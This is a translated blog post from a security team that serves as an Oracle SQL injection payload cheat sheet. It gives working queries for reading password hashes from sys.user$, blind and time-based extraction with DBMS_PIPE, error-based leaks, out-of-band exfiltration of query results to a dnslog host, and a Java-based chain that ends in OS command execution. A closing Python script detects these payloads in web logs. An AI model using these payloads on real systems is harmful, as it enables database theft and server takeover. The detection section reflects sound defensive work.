Good morning, everybody!
The ChaMd5 security team's most diligent editor is online!
Oracle is a relational database management system from Oracle Corporation.
The User Process, Server Process and PGA can be regarded as the client side; the instance at the top and the database at the bottom, together with the parameter file, password file and archived log files, make up the Oracle Server, so the whole diagram can be read as a client/server (C/S) architecture.
An Oracle Server consists of two entities:
the instance and the database
https://github.com/ChaMd5Team/Pentest-tools/tree/master/Oracleinject
Oracle characteristics:
When Oracle fetches data with a query, the statement must name a table; when no table is wanted, dual can be used. dual is Oracle's dummy table, present only to satisfy the syntax rules of SELECT, and Oracle guarantees that dual always contains exactly one row.
Get the database version:
SELECT banner FROM v$version WHERE banner LIKE 'Oracle%';
SELECT version FROM v$instance;
Get the operating system version:
SELECT banner FROM v$version where banner like 'TNS%';
Get the current database user:
SELECT user FROM dual;
Get the current user's privileges:
SELECT * FROM session_privs;
Get the passwords of all database users (spare4 holds the hash):
SELECT name, spare4 FROM sys.user$;
List DBA accounts:
Get the data file paths:
SELECT name FROM V$DATAFILE;
Function-based injection
Substr function:
select substr(user, 1, 1) from dual;
Decode function:
A wrong guess returns 2:
select decode(substr(user, 1, 1), '1', (1/1),2) from dual;
A correct guess returns 1:
select decode(substr(user, 1, 1), 'S', (1/1),2) from dual;
Instr function:
No match returns 0:
select instr((select user from dual),'admin') FROM dual;
A match returns 1:
select instr((select user from dual),'SYS') FROM dual;
Time-based blind injection:
Statement one: when the guess is correct, the query is delayed by about 10 seconds and returns 1:
select 1 from dual where DBMS_PIPE.RECEIVE_MESSAGE('olo', REPLACE((SELECT substr(user, 1, 1) FROM dual), 'S', 10))=1;
Statement two: when the guess is correct, the query is delayed by about 10 seconds and returns 1:
select decode(substr(user,1,1),'S',dbms_pipe.receive_message('olo',10),0) from dual;
Statement three: when the guess is correct, the query is delayed by about 10 seconds and returns 1:
select 1 from dual where 1=0 or DBMS_PIPE.RECEIVE_MESSAGE('pyy', REPLACE((SELECT substr(user, 1, 1) FROM dual), 'S', 10))=1;
Error-based injection:
ctxsys.drithsx.sn() function:
select ctxsys.drithsx.sn(1, (select user from dual)) from dual;
ctxsys.ctx_report.token_type() function:
select ctxsys.ctx_report.token_type((select user from dual), '1') from dual;
xmltype() function:
select xmltype('<:'||(select user from dual)||'>') from dual;
dbms_xdb_version.checkin() function:
select dbms_xdb_version.checkin((select user from dual)) from dual;
dbms_xdb_version.makeversioned() function:
select dbms_xdb_version.makeversioned((select user from dual)) from dual;
dbms_xdb_version.uncheckout() function:
select dbms_xdb_version.uncheckout((select user from dual)) from dual;
dbms_utility.sqlid_to_sqlhash() function:
SELECT dbms_utility.sqlid_to_sqlhash((select user from dual)) from dual;
ordsys.ord_dicom.getmappingxpath() function:
select ordsys.ord_dicom.getmappingxpath((select user from dual), 1, 1) from dual;
utl_inaddr.get_host_name() function:
select utl_inaddr.get_host_name((select user from dual)) from dual;
utl_inaddr.get_host_address() function:
select utl_inaddr.get_host_address('~'||(select user from dual)||'~') from dual;
Out-of-band channels (OOB):
An alternative channel, outside the normal query/response path, is used to reach a server the attacker controls. Typically Oracle is made to send an HTTP or DNS request that carries the query result, and the attacker then reads the result out of the HTTP or DNS logs of that external server. This turns tedious blind injection, especially time-based blind injection, into a direct way of reading query results and speeds it up enormously.
utl_http.request() function:
SELECT UTL_HTTP.REQUEST((select user from dual)||'.xxxxx.dnslog.cn') FROM DUAL;
utl_inaddr.get_host_address() function:
select utl_inaddr.get_host_address((select user from dual)||'.xxxxxx.dnslog.cn') from dual;
sys.dbms_ldap.init() function:
select dbms_ldap.init('xxxxxx.dnslog.cn',80) from dual;
httpuritype() function:
select httpuritype((select user from dual)||'.xxxxxx.dnslog.cn').getclob() from dual;
Executing system commands (create a Java source, grant it file permission, then wrap it in a PL/SQL function):
select null,null from dual union select 1,dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"n";myReader.close();return str;} catch (Exception e){return e.toString();}}}'';commit;end;') from dual;
select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''begin dbms_java.grant_permission( ''''SYSTEM'''', ''''SYS:java.io.FilePermission'''', ''''<<ALL FILES>>'''',''''EXECUTE'''');end;''commit;end;') from dual;
select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''create or replace function osshell(p_cmd in varchar2) return varchar2 as language java name ''''LinxUtil.runCMD(java.lang.String) return String''''; '';commit;end;') from dual;
Run a system command through the new function:
select osshell('whoami') from dual;
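From the defender's side, the payloads above share a small set of Oracle-specific package and function names that normal application SQL almost never uses. The following added example (not from the original post or the ChaMd5 tool) groups those names by technique and runs the check over a few constructed web-access log lines; the log format, the IPs and the host attacker.example are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Oracle-specific function families from the payloads above, grouped by technique.
# utl_inaddr.get_host_address is used on the page both for error-based extraction and
# for DNS out-of-band exfiltration, so it appears in both groups.
SIGNATURES = {
    "time-based": [r"dbms_pipe\s*\.\s*receive_message"],
    "error-based": [r"ctxsys\s*\.\s*drithsx\s*\.\s*sn", r"ctxsys\s*\.\s*ctx_report\s*\.\s*token_type",
                    r"\bxmltype\s*\(", r"dbms_xdb_version\s*\.", r"dbms_utility\s*\.\s*sqlid_to_sqlhash",
                    r"ordsys\s*\.\s*ord_dicom", r"utl_inaddr\s*\.\s*get_host_(name|address)"],
    "out-of-band": [r"utl_http\s*\.\s*request", r"dbms_ldap\s*\.\s*init", r"\bhttpuritype\s*\(",
                    r"utl_inaddr\s*\.\s*get_host_address\s*\(.*\|\|"],
    "code-execution": [r"dbms_xmlquery\s*\.\s*newcontext", r"dbms_java\s*\.\s*grant_permission",
                       r"java\s+source\s+named", r"language\s+java\s+name"],
}
COMPILED = {t: [re.compile(p, re.IGNORECASE) for p in pats] for t, pats in SIGNATURES.items()}


def classify(text):
    """Sorted list of techniques whose signatures occur in `text`.

    The text is URL-decoded first so encoded request parameters are matched as the SQL
    the database would see, and /* */ comments are stripped because they can split
    keywords without changing what Oracle executes.
    """
    decoded = re.sub(r"/\*.*?\*/", "", unquote_plus(text))
    return sorted(t for t, pats in COMPILED.items() if any(p.search(decoded) for p in pats))


def scan_log(lines):
    """Return (client_ip, techniques) per matching line; assumes the constructed
    format '<ip> "<method> <path> <proto>" <status>' where the IP comes first."""
    hits = []
    for line in lines:
        techniques = classify(line)
        if techniques:
            hits.append((line.split(" ", 1)[0], techniques))
    return hits


# Constructed sample access-log lines; attacker.example is a placeholder collaborator host.
SAMPLE_LOG = [
    '10.0.0.5 "GET /item?id=1 HTTP/1.1" 200',
    "10.0.0.9 \"GET /item?id=1+and+1%3Ddecode(substr(user,1,1),'S',dbms_pipe.receive_message('olo',10),0) HTTP/1.1\" 200",
    "10.0.0.9 \"GET /item?id=1+union+select+utl_http.request((select+user+from+dual)||'.attacker.example')+from+dual HTTP/1.1\" 500",
    "10.0.0.9 \"GET /item?id=1+and+ctxsys.drithsx.sn(1,(select+user+from+dual))%3D1 HTTP/1.1\" 500",
]
```

Signature matching like this is a triage aid, not a parser; the same names should also be reviewed in the database itself, since an application account that has no EXECUTE privilege on these packages cannot be driven through most of the payloads on this page.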
Acknowledgements:
https://xz.aliyun.com/t/7897
End
The ChaMd5 CTF group is recruiting on an ongoing basis,
especially strong crypto, reverse, pwn and smart-contract players.
Feel free to contact admin@chamd5.org